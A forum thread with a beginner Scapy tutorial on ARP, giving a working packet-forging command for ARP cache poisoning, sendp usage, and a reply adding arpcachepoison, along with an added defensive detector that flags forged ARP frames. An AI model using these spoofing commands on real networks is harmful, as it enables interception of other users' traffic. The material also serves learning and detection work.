Thread: Scapy Tutorial - Part 1 - ARP

  1. #1
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    1

    Scapy Tutorial - Part 1 - ARP

    Hi guys,
    Since I CAN'T post this stuff in the normal tutorial area (just subscribed), I guess I'll post this right here.
    I downloaded a great new tool called Scapy, which permits packet forging under Linux.
    I didn't see much information or tutorials about this, so I decided to write one myself.
    To FULLY understand this tutorial, it would be better to have a basic conception of the OSI layers.

    In this part of the tutorial, we will cover (a bit) the ARP protocol.
    -------------
    ARP spoofing:
    --------------
    An ARP-spoofing packet can be created with the following command:
    "Ether(dst='00:15:F20:46:40')/ARP(hwsrc='00:11:22:33:44:55', pdst='192.168.3.95', psrc='192.168.3.66', op=1)"
    Where:
    dst of Ether is only layer 2 related: ARP doesn't give a shit about that parameter
    hwsrc of ARP is the MAC you want to be in the remote ARP table
    pdst of ARP is the IP (the real one!) of the remote machine in which you want to infect the ARP table
    psrc of ARP is the IP (fake) you want to be in the remote ARP table

    To send the packet, please use the iface="ethX" option with the command sendp (layer 2)
    ex: sendp(arp_spoof,iface="eth0")

    A packet named 'arp_spoof' will already be instantiated from the session file.

    ARP Query (regular):
    --------------
    An ARP query ("who-has") packet can be created with the following command:
    "ARP(pdst='192.168.3.95', psrc='192.168.3.1', op=1)"
    Where:
    pdst = the IP you want the MAC address from
    psrc = if you want to receive the answer while NOT being in promiscuous mode.
    BEWARE: Not setting a real IP will poison the ARP table of the remote computer, which is not THAT bad because the IP doesn't exist, but still...
    To send the packet, use a layer 3 sending function, like:
    sr(ARP(pdst='192.168.3.95', psrc='192.168.3.1', op=1))

    A packet named 'arp_query' should already be instantiated from the session file.
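
Seen from the defending side, the packet in the post above leaves two traces on the wire: Scapy fills the Ethernet source with the sender's real MAC while the ARP hwsrc is forged, and the claimed IP suddenly maps to a different MAC. The Python below is an added example, not part of the original post; it parses raw ARP frames and flags both conditions on a constructed two-frame capture (the function names and the 00:aa:bb:cc:dd:xx addresses are made up for illustration).

```python
import struct

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def ip(b):
    return ".".join(str(x) for x in b)

def parse_arp(frame):
    """Return (eth_src, op, hwsrc, psrc) for an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return mac(frame[6:12]), op, mac(frame[22:28]), ip(frame[28:32])

def check(frames, bindings=None):
    """Flag the two traces a forged ARP packet leaves on the wire."""
    bindings = {} if bindings is None else bindings  # IP -> MAC learned so far
    alerts = []
    for n, frame in enumerate(frames):
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        eth_src, op, hwsrc, psrc = parsed
        if eth_src != hwsrc:  # layer 2 sender disagrees with the ARP payload
            alerts.append((n, "src-mismatch", psrc, hwsrc))
        if psrc == "0.0.0.0":  # ARP probe, carries no binding
            continue
        known = bindings.setdefault(psrc, hwsrc)
        if known != hwsrc:  # same IP now claimed by another MAC
            alerts.append((n, "binding-changed", psrc, hwsrc))
    return alerts

def build(eth_src, hwsrc, psrc, pdst, op=1):
    """Constructed sample frame as bytes (test data only, nothing is sent)."""
    m = lambda s: bytes.fromhex(s.replace(":", ""))
    i = lambda s: bytes(int(x) for x in s.split("."))
    return (b"\xff" * 6 + m(eth_src) + b"\x08\x06" + struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
            + m(hwsrc) + i(psrc) + bytes(6) + i(pdst))

# Constructed capture: a normal who-has from 192.168.3.66, then a request that
# claims the same IP with the MAC from the post while the Ethernet source differs.
SAMPLE = [
    build("00:aa:bb:cc:dd:01", "00:aa:bb:cc:dd:01", "192.168.3.66", "192.168.3.95"),
    build("00:aa:bb:cc:dd:02", "00:11:22:33:44:55", "192.168.3.66", "192.168.3.95"),
]
```

Calling check(SAMPLE) reports both alerts on the second frame; passing a bindings dict seeded from known-good static or DHCP entries lets the first forged frame be caught as well.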

  2. #2

    nice tutorial.. one word of advice:

    That is *not* a tutorial. That is an explanation of ARP spoofing that can be found literally everywhere.

    I would like to see a tutorial made by you, for editing the arp packet manually and sending it over the network... that will teach yourself first, and the others, possibly, second.

    Nice trying to help, though - keep the spirit up.

  3. #3
    Member
    Join Date
    Jun 2007
    Posts
    218

    For arp spoofing you can also use

    arpcachepoison(target_IP, victim_IP, interval=5)
